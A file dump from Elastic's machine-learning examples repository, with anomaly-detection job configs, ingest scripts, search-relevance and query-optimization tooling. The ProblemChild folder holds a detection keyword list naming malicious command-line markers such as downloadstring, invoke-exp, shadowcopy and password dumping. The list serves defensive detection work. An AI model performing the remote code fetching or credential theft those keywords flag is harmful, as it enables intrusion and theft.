 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_count (twitter_trends)",
 9 |         "function": "high_count",
10 |         "partition_field_name": "fields.topic",
11 |         "detector_rules": []
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "fields.topic",
16 |       "entities.hashtags.text",
17 |       "entities.user_mentions.name",
18 |       "retweeted_status.entities.user_mentions.name",
19 |       "user.name",
20 |       "user.location",
21 |       "entities.urls.display_url",
22 |       "retweeted_status.entities.hashtags.text",
23 |       "retweeted_status.entities.urls.display_url"
24 |     ]
25 |   },
26 |   "data_description": {
27 |     "time_field": "created_at",
28 |     "time_format": "epoch_ms"
29 |   }
30 | }


--------------------------------------------------------------------------------
/Machine Learning/Class Assigment Objectives/requirements.txt:
--------------------------------------------------------------------------------
 1 | eland==7.10.1b1
 2 | elasticsearch==7.10.1
 3 | jupyter==1.0.0
 4 | matplotlib==3.3.4
 5 | numpy==1.19.5
 6 | pandas==1.1.5
 7 | requests==2.25.1
 8 | scikit-learn==0.24.1
 9 | seaborn==0.11.1
10 | 


--------------------------------------------------------------------------------
/Machine Learning/DGA Detection/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | This folder contains the supplementary materials for the following blogposts
 3 | 
 4 | 
 5 | ### Machine learning in cybersecurity: Training supervised models to detect DGA activity
 6 | * [blogpost](https://www.elastic.co/blog/machine-learning-in-cybersecurity-training-supervised-models-to-detect-dga-activity)
 7 | * [supplementary materials](training-supervised-models-to-detect-dga-activity.md)
 8 | 
 9 | ### Machine learning in cybersecurity: Detecting DGA activity in network data
10 | * [blogpost](https://www.elastic.co/blog/machine-learning-in-cybersecurity-detecting-dga-activity-in-network-data)
11 | * [supplementary materials](detecting-dga-activity-in-network-data.md)
12 | 
13 | 


--------------------------------------------------------------------------------
/Machine Learning/DGA Detection/ngram-extractor-reindex.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 | String nGramAtPosition(String fulldomain, int fieldcount, int n){
 6 |   String domain = fulldomain.splitOnToken('.')[0];
 7 |   if (fieldcount+n>=domain.length()){
 8 |     return ''
 9 |   }
10 |   else 
11 | {
12 |   return domain.substring(fieldcount, fieldcount+n)
13 | }
14 | }
15 | for (int i=0;i<ctx['domain'].length();i++){
16 |   ctx[Integer.toString(params.ngram_count)+'-gram_field'+Integer.toString(i)] = nGramAtPosition(ctx['domain'], i, params.ngram_count)
17 | }
18 |  """
19 |   }
20 | }
21 | 


--------------------------------------------------------------------------------
/Machine Learning/Data Frames/anonreviews.csv.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Data Frames/anonreviews.csv.bz2


--------------------------------------------------------------------------------
/Machine Learning/Feature Importance/README.md:
--------------------------------------------------------------------------------
 1 | # Feature importance for data frame analytics
 2 | 
 3 | In the notebook we assume that you have [Elasticsearch 7.6 or later](https://www.elastic.co/downloads/elasticsearch) and you run it locally on the port 9200. If you don't, learn how to [get Elasticsearch up and running](https://www.elastic.co/guide/en/elasticsearch/reference/7.6/getting-started-install.html).
 4 | 
 5 | Set up a local instance of Jupyter using the following instructions
 6 | 
 7 | 1. Set up a virtual environment called `env` 
 8 | 
 9 | ```
10 | python3 -m venv env
11 | ``` 
12 | 
13 | 2. Activate it
14 | 
15 | ```
16 | source env/bin/activate
17 | ```
18 | 
19 | 3. Install the required dependencies for your chosen Jupyter notebook
20 | 
21 | ```
22 | pip install -r requirements.txt
23 | ```
24 | 
25 | 4. Launch Jupyter
26 | 
27 | ```
28 | jupyter notebook
29 | ```
30 | 
31 | 


--------------------------------------------------------------------------------
/Machine Learning/Feature Importance/requirements.txt:
--------------------------------------------------------------------------------
 1 | dash==1.8.0
 2 | dash-core-components==1.7.0
 3 | iml==0.6.2
 4 | ipykernel==5.1.3
 5 | ipywidgets==7.5.1
 6 | jupyter==1.0.0
 7 | matplotlib==3.1.1
 8 | numpy==1.18.1
 9 | plotly==4.4.1
10 | seaborn==0.10.0
11 | widgetsnbextension==3.5.1
12 | xgboost==0.90
13 | requests==2.22.0
14 | elasticsearch==7.5.1
15 | eland==7.5.1a3
16 | pandas==0.25.3
17 | psutil==5.6.7
18 | orca==1.5.3
19 | xlrd >= 1.0.0


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/README.md:
--------------------------------------------------------------------------------
1 | Each subfolder contains information that will allow you to configure, run, and test an example IT Operations machine learning use case. IT operations use cases detect anomalies associated with errors, slowdowns, and interruptions in the operation of a system or service. Each detected anomaly is assigned a normalized Anomaly Score, and is annotated with values of other fields in the data that have statistical influence on the anomaly, called influencers.
2 | 


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/service_response_change/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-service_response_change",
 3 |   "job_id": "service_response_change",
 4 |   "indexes": [
 5 |     "filebeat-*"
 6 |   ],
 7 |   "types": [
 8 |     "log"
 9 |   ],
10 |   "query": {
11 |     "match_all": {}
12 |   },
13 |   "scroll_size": 1000,
14 |   "query_delay": "60s",
15 |   "frequency": "150s"
16 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/service_response_change/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "service_response_change",
 3 |   "description": "service response change",
 4 |   "analysis_config": {
 5 |     "bucket_span": "30m",
 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_count",
 9 |         "function": "high_count",
10 |         "partition_field_name": "beat.hostname",
11 |         "detector_rules": [],
12 |         "by_field_name": "apache2.access.response_code"
13 |       }
14 |     ],
15 |     "influencers": [
16 |       "apache2.access.response_code",
17 |       "apache2.access.site_area",
18 |       "apache2.access.geoip.country_iso_code"
19 |     ]
20 |   },
21 |   "data_description": {
22 |     "format": "delimited",
23 |     "time_field": "@timestamp",
24 |     "time_format": "epoch",
25 |     "field_delimiter": "\t",
26 |     "quote_character": "\""
27 |   }
28 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/configs/ingest/core_id.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "Copys core id to a keyword field for ML Partition",
 3 |   "processors": [
 4 |     {
 5 |       "set": {
 6 |         "field": "_source.system.core.core_id",
 7 |         "value": "core_{{system.core.id}}"
 8 |       }
 9 |     }
10 |   ]
11 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/configs/metricbeat/metricbeat.yml:
--------------------------------------------------------------------------------
 1 | metricbeat.modules:
 2 | - module: system
 3 |   metricsets:
 4 |     - core
 5 |   enabled: true
 6 |   period: 5s
 7 |   processes: ['.*']
 8 | name: dales 
 9 | output.elasticsearch:
10 |   hosts: ["10.10.10.112:9200"]
11 |   username: "elastic"
12 |   password: "changeme"
13 |   pipeline: core_id
14 | 


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "system_metric_change",
 3 |   "indexes": [
 4 |     "metricbeat-*"
 5 |   ],
 6 |   "types": [
 7 |     "metricsets"
 8 |   ],
 9 |   "query": {
10 |     "term": {
11 |       "metricset.name": {
12 |         "value": "core"
13 |       }
14 |     }
15 |   },
16 |   "scroll_size": 1000,
17 |   "query_delay": "60s",
18 |   "frequency": "150s"
19 | }


--------------------------------------------------------------------------------
/Machine Learning/IT Operations Recipes/system_metric_change/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "system_metric_change",
 3 |   "description": "system metric change",
 4 |   "analysis_config": {
 5 |     "bucket_span": "1m",
 6 |     "detectors": [
 7 |       {
 8 |         "detector_description": "high_mean(\"system.core.user.pct\") by \"system.core.core_id\" partitionfield=\"beat.name\"",
 9 |         "function": "high_mean",
10 |         "field_name": "system.core.user.pct",
11 |         "by_field_name": "system.core.core_id",
12 |         "partition_field_name": "beat.name",
13 |         "detector_rules": []
14 |       }
15 |     ],
16 |     "influencers": [
17 |       "system.core.core_id",
18 |       "beat.name"
19 |     ],
20 |     "use_per_partition_normalization": false
21 |   },
22 |   "data_description": {
23 |     "time_field": "@timestamp"
24 |   }
25 | }


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | /notebooks/.ipynb_checkpoints
3 | /venv/
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/Makefile:
--------------------------------------------------------------------------------
 1 | default: test
 2 | 
 3 | all: clean init test
 4 | 
 5 | venv/bin/activate:
 6 | 	@rm -rf venv/
 7 | 	@python3 -m venv venv
 8 | 
 9 | .PHONY: clean
10 | clean:
11 | 	@rm -rf venv/
12 | 
13 | .PHONY: init
14 | init: venv/bin/activate
15 | 	. venv/bin/activate ; \
16 | 	pip install -r requirements.txt
17 | 
18 | .PHONY: unit-test
19 | unit-test: venv/bin/activate
20 | 	. venv/bin/activate ; \
21 |     python3 -m unittest discover -s tests/unit
22 | 
23 | .PHONY: integration-test
24 | integration-test: venv/bin/activate
25 | 	. venv/bin/activate ; \
26 |     python3 -m unittest discover -s tests/integration
27 | 
28 | test: unit-test integration-test
29 | 
30 | .PHONY: jupyter
31 | jupyter: venv/bin/activate
32 | 	. venv/bin/activate ; \
33 | 	jupyter lab
34 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/bin/prepare:
--------------------------------------------------------------------------------
 1 | #!venv/bin/python
 2 | 
 3 | """
 4 | Prepares the basic resources required: indices, pipelines, transforms.
 5 | """
 6 | 
 7 | import argparse
 8 | import os
 9 | import sys
10 | 
11 | from elasticsearch import Elasticsearch
12 | 
13 | # project library
14 | sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
15 | from metrics.resources import prepare
16 | 
17 | DEFAULT_URL = 'http://localhost:9200'
18 | 
19 | 
20 | def main():
21 |     parser = argparse.ArgumentParser(prog='prepare')
22 |     parser.add_argument('--url', default=DEFAULT_URL, help="An Elasticsearch connection URL, e.g. http://user:secret@localhost:9200")
23 |     args = parser.parse_args()
24 | 
25 |     es = Elasticsearch(args.url)
26 | 
27 |     # create all resources
28 |     prepare(es)
29 | 
30 | 
31 | if __name__ == "__main__":
32 |     main()
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/config/pipelines/ecs-search-metrics.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "processors": [
 3 |     {
 4 |       "script": {
 5 |         "if": "(ctx.event.action == 'SearchMetrics.query' || ctx.event.action == 'SearchMetrics.page') && ctx.SearchMetrics.results.size == null",
 6 |         "source": "ctx.SearchMetrics.results.size = ctx.SearchMetrics.results.ids.size()"
 7 |       }
 8 |     },
 9 |     {
10 |       "script": {
11 |         "if": "ctx.event.action == 'SearchMetrics.click' && ctx.SearchMetrics.click.result.reciprocal_rank == null",
12 |         "source": "ctx.SearchMetrics.click.result.reciprocal_rank = 1.0 / ctx.SearchMetrics.click.result.rank"
13 |       }
14 |     }
15 |   ]
16 | }
17 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/config/pipelines/ecs-search-metrics_transform_completion.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "processors" : [
 3 |     {
 4 |       "drop": {
 5 |         "if": "ctx.metrics.num_queries < 3 || ctx.metrics.mean_max_reciprocal_rank < 0.2"
 6 |       }
 7 |     }
 8 |   ],
 9 |   "on_failure" : [
10 |     {
11 |       "set" : {
12 |         "field" : "_index",
13 |         "value" : "{{_index}}_failed"
14 |       }
15 |     }
16 |   ]
17 | }
18 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/metrics/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/metrics/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/requirements.txt:
--------------------------------------------------------------------------------
 1 | # Please:
 2 | ## * use version pinning
 3 | ## * version pin to a major or minor version but not to a patch version (when possible)
 4 | ## * keep things organized and clear (sort alphabetically within each category)
 5 | ## * put common dependencies here
 6 | ## * use in-notebook `%pip install x` for one-off needs
 7 | 
 8 | # core
 9 | jupyterlab==1.1.*
10 | pip==20.*
11 | 
12 | # non-core
13 | ## misc
14 | Faker==2.0.*
15 | requests==2.24.*
16 | tqdm==4.38.*
17 | wheel==0.33.*
18 | 
19 | ## data science
20 | eland>=7.*
21 | elasticsearch==7.*
22 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/setup.py:
--------------------------------------------------------------------------------
1 | from setuptools import setup, find_packages
2 | 
3 | setup(
4 |     name='metrics',
5 |     version='0.1.0',
6 |     python_requires=">=3.7.0",
7 |     packages=find_packages(exclude=('tests', 'docs')),
8 | )
9 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/tests/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/integration/__init__.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import metrics.resources as resources
 3 | 
 4 | from elasticsearch import Elasticsearch
 5 | 
 6 | ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
 7 | 
 8 | # Define test files and indices
 9 | ELASTICSEARCH_HOST = os.environ.get("ELASTICSEARCH_HOST") or "localhost"
10 | 
11 | # Define client to use in tests
12 | TEST_SUITE = os.environ.get("TEST_SUITE", "xpack")
13 | if TEST_SUITE == "xpack":
14 |     ES_TEST_CLIENT = Elasticsearch(
15 |         ELASTICSEARCH_HOST, http_auth=("elastic", "changeme"),
16 |     )
17 | else:
18 |     ES_TEST_CLIENT = Elasticsearch(ELASTICSEARCH_HOST)
19 | 
20 | METRICS_INDEX = f'{resources.INDEX}_transform_queryid'
21 | 


--------------------------------------------------------------------------------
/Machine Learning/Online Search Relevance Metrics/tests/unit/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Online Search Relevance Metrics/tests/unit/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/Introduction/README.md:
--------------------------------------------------------------------------------
1 | # advent-outliers
2 | 
3 | To run this example, please ensure that you have the following:
4 | 
5 | * an elasticsearch cluster (version 7.2+) running on `localhost:9200`
6 | * the dependencies listed in `requirements.txt`. To install these, please run  - `pip install -r requirements.txt`
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/Introduction/requirements.txt:
--------------------------------------------------------------------------------
1 | jupyter
2 | numpy
3 | requests
4 | elasticsearch
5 | sklearn
6 | 


--------------------------------------------------------------------------------
/Machine Learning/Outlier Detection/README.md:
--------------------------------------------------------------------------------
1 | # Outlier Detection
2 | 
3 | This directory contains examples showcasing Elastic's outlier detection analyses within Machine Learning, which was released in version 7.2.
4 | 
5 | * [Introduction](Introduction/) shows you how to think about outliers in a 2-dimensional case. We walk you through building up a dataset with particular features and demonstrates how to create and start an outlier detection analysis, and how to analyze the outlier score and feature influence results.
6 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/README.md:
--------------------------------------------------------------------------------
1 | 
2 | This folder contains the supplementary materials for the following blogpost:
3 | 
4 | ### ProblemChild: Detecting living-off-the-land attacks using the Elastic Stack
5 | * [blogpost](https://www.elastic.co/blog/problemchild-detecting-living-off-the-land-attacks)
6 | * [supplementary materials](problemchild-end-to-end.md)
7 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/blocklist.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 |     for(item in params.blocklist){
 6 |       if(ctx['feature_command_line'].contains(item)){
 7 |         ctx.blocklist_label = 1
 8 |       }
 9 |     }
10 |    
11 |  """
12 |   }
13 | }
14 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/blocklist_keywords.txt:
--------------------------------------------------------------------------------
 1 | dump
 2 | -embedding
 3 | privilege
 4 | administrator
 5 | password
 6 | key
 7 | shadowcopy
 8 | delete
 9 | masquerade
10 | evil
11 | bad
12 | anonymous
13 | allprofiles
14 | .hta
15 | createobject
16 | target
17 | suspicious
18 | obfuscated
19 | bypass
20 | bootstatuspolicy
21 | recoveryenabled
22 | systemstatebackup
23 | comspec
24 | base64string
25 | .text.encoding
26 | .compression.
27 | memorystream
28 | writeallbytes
29 | webclient
30 | downloadfile
31 | downloadstring
32 | bitstransfer
33 | invoke-exp
34 | invoke-web
35 | reflection.assembly
36 | assembly.gettype
37 | sockets


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-host-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious child processes on a single host. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by host",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "host.hostname",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "host.hostname",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-parent-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious child processes spawned by the same parent process. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by parent process",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "process.parent.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "process.parent.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-high-sum-by-user-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a set of one or more malicious processes, started by the same user. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "high sum by user",
 8 |         "function": "high_sum",
 9 |         "field_name": "problemchild.prediction_probability",
10 |         "by_field_name": "user.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "user.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-host-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a process that has been classified as malicious on a host that does not commonly manifest malicious process activity. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a host",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "host.hostname",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "host.hostname",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }
25 | 


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-parent-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for rare malicious child processes spawned by a parent process. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a parent process",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "process.parent.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "process.parent.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/job_configs/experimental-rare-process-by-user-problemchild.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "description": "A machine learning job to detect potential living off the land activity. Looks for a process that has been classified as malicious where the user context is unusual and does not commonly manifest malicious process activity. This is an experimental job and is therefore unsupported.",
 3 |   "analysis_config": {
 4 |     "bucket_span": "15m",
 5 |     "detectors": [
 6 |       {
 7 |         "detector_description": "rare process given a user",
 8 |         "function": "rare",
 9 |         "by_field_name": "process.name",
10 |         "partition_field_name": "user.name",
11 |         "detector_index": 0
12 |       }
13 |     ],
14 |     "influencers": [
15 |       "process.name",
16 |       "user.name",
17 |       "process.command_line"
18 |     ]
19 |   },
20 |   "data_description": {
21 |     "time_field": "@timestamp",
22 |     "time_format": "epoch_ms"
23 |   }
24 | }


--------------------------------------------------------------------------------
/Machine Learning/ProblemChild/ngram_extractor.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "script": {
 3 |     "lang": "painless",
 4 |     "source": """
 5 | String nGramAtPosition(String field, int fieldcount, int n) {
 6 |   if (fieldcount+n>field.length()) {
 7 |     return ''
 8 |   }
 9 |   else 
10 | {
11 |   return field.substring(fieldcount, fieldcount+n)
12 | }
13 | }
14 | String fieldtext = ctx[params.field];
15 | if(fieldtext.length()>=params.max_length) {
16 |   fieldtext = fieldtext.substring(0, params.max_length);
17 | }
18 | else {
19 |   fieldtext = fieldtext;
20 | }
21 | for (int i=0;i<(fieldtext.length());i++) {
22 |   ctx[params.field+'_'+Integer.toString(params.ngram_count)+'-gram_feature'+Integer.toString(i)] = nGramAtPosition(fieldtext, i, params.ngram_count)
23 | }
24 |  """
25 |   }
26 | }
27 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | trec_eval-9.0.7*
3 | /data/
4 | /venv/
5 | /notebooks/.ipynb_checkpoints/
6 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/Makefile:
--------------------------------------------------------------------------------
 1 | default: test
 2 | 
 3 | all: clean init test
 4 | 
 5 | venv/bin/activate:
 6 | 	rm -rf venv/
 7 | 	python3 -m venv venv
 8 | 
 9 | .PHONY: clean
10 | clean:
11 | 	rm -rf venv/
12 | 
13 | .PHONY: init
14 | init: venv/bin/activate
15 | 	. venv/bin/activate ; \
16 | 	pip install -r requirements.txt
17 | 
18 | .PHONY: test
19 | test: venv/bin/activate
20 | 	. venv/bin/activate ; \
21 | 	python3 -m unittest discover -s tests
22 | 
23 | .PHONY: jupyter
24 | jupyter: venv/bin/activate
25 | 	. venv/bin/activate ; \
26 | 	jupyter lab
27 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/metric-mrr-100.json:
--------------------------------------------------------------------------------
1 | {
2 |   "mean_reciprocal_rank": {
3 |     "k": 100,
4 |     "relevant_rating_threshold": 1
5 |   }
6 | }
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/msmarco-document-index.defaults.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "settings": {
 3 |     "index": {
 4 |       "number_of_shards": 1,
 5 |       "number_of_replicas": 0
 6 |     }
 7 |   },
 8 |   "mappings": {
 9 |     "dynamic": "strict",
10 |     "properties": {
11 |       "id": {
12 |         "ignore_above": 1024,
13 |         "type": "keyword"
14 |       },
15 |       "url": {
16 |         "type": "text",
17 |         "analyzer": "standard"
18 |       },
19 |       "title": {
20 |         "type": "text",
21 |         "analyzer": "english"
22 |       },
23 |       "body": {
24 |         "type": "text",
25 |         "analyzer": "english"
26 |       }
27 |     }
28 |   }
29 | }
30 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/optimize-query.best_fields.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "num_iterations": 100,
 3 |   "num_initial_points": 40,
 4 |   "space": {
 5 |     "tie_breaker": { "low": 0.0, "high": 1.0 },
 6 |     "url|boost": { "low": 0.0, "high": 10.0 },
 7 |     "title|boost": { "low": 0.0, "high": 10.0 },
 8 |     "body|boost": { "low": 0.0, "high": 10.0 }
 9 |   }
10 | }
11 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/optimize-query.cross_fields.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "num_iterations": 75,
 3 |   "num_initial_points": 30,
 4 |   "space": {
 5 |     "minimum_should_match": { "low": 30, "high": 70 },
 6 |     "tie_breaker": { "low": 0.0, "high": 1.0 },
 7 |     "url|boost": { "low": 0.0, "high": 10.0 },
 8 |     "title|boost": { "low": 0.0, "high": 10.0 },
 9 |     "body|boost": { "low": 0.0, "high": 10.0 }
10 |   },
11 |   "default": {
12 |     "operator": "OR"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/params.best_fields.baseline.json:
--------------------------------------------------------------------------------
1 | {
2 |   "tie_breaker": 0.0,
3 |   "url|boost": 1.0,
4 |   "title|boost": 1.0,
5 |   "body|boost": 1.0
6 | }
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/config/params.cross_fields.baseline.json:
--------------------------------------------------------------------------------
1 | {
2 |   "operator": "OR",
3 |   "minimum_should_match": 50,
4 |   "tie_breaker": 0.0,
5 |   "url|boost": 1.0,
6 |   "title|boost": 1.0,
7 |   "body|boost": 1.0
8 | }
9 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/qopt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Query Optimization/qopt/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/requirements.txt:
--------------------------------------------------------------------------------
 1 | # Please:
 2 | ## * use version pinning
 3 | ## * version pin to a major or minor version but not to a patch version (when possible)
 4 | ## * keep things organized and clear (sort alphabetically within each category)
 5 | ## * put common dependencies here
 6 | ## * use in-notebook `%pip install x` for one-off needs
 7 | 
 8 | # core
 9 | jupyterlab==2.1.*
10 | pip==20.*
11 | wheel==0.35.*
12 | 
13 | # non-core
14 | ## misc
15 | tqdm==4.38.*
16 | 
17 | ## search
18 | elasticsearch==7.*
19 | 
20 | ## data science
21 | matplotlib==3.2.*
22 | scikit-learn==0.23.*
23 | scikit-optimize==0.8.*
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20201125-elastic-optimized_best_fields/metadata.json:
--------------------------------------------------------------------------------
1 | {
2 |   "team": "Josh Devins - Elastic",
3 |   "model_description": "Elasticsearch optimized multi_match best_fields",
4 |   "paper": "https://www.elastic.co/blog/improving-search-relevance-with-data-driven-query-optimization",
5 |   "code": "https://github.com/elastic/examples/tree/master/Machine%20Learning/Query%20Optimization/",
6 |   "type": "full ranking"
7 | }
8 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20201125-elastic-optimized_best_fields/params.json:
--------------------------------------------------------------------------------
1 | {
2 |   "tie_breaker": 0.3936135232328522,
3 |   "url|boost": 0.0,
4 |   "title|boost": 8.63280262513067,
5 |   "body|boost": 10.0
6 | }
7 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20210120-elastic-doc2query_optimized_most_fields/metadata.json:
--------------------------------------------------------------------------------
1 | {
2 |   "team": "Josh Devins - Elastic",
3 |   "model_description": "Elasticsearch doc2query (T5) + optimized multi_match most_fields",
4 |   "paper": "https://www.elastic.co/blog/improving-search-relevance-with-data-driven-query-optimization",
5 |   "code": "https://github.com/elastic/examples/tree/master/Machine%20Learning/Query%20Optimization/",
6 |   "type": "full ranking"
7 | }
8 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/submissions/20210120-elastic-doc2query_optimized_most_fields/params.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "url|boost": 5.019618907965658,
 3 |   "title|boost": 2.1715172653248564,
 4 |   "title_bigrams|boost": 0.6258343432390224,
 5 |   "body|boost": 8.97005088495938,
 6 |   "body_bigrams|boost": 0.785011613141371,
 7 |   "expansions|boost": 9.958043226768973,
 8 |   "expansions_bigrams|boost": 2.6104666149721205
 9 | }
10 | 


--------------------------------------------------------------------------------
/Machine Learning/Query Optimization/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Machine Learning/Query Optimization/tests/__init__.py


--------------------------------------------------------------------------------
/Machine Learning/README.md:
--------------------------------------------------------------------------------
1 | This package provides a collection of getting started examples and recipes to help you get started with the machine learning features for the Elastic Stack, that were introduced in X-Pack 5.4. 
2 | 


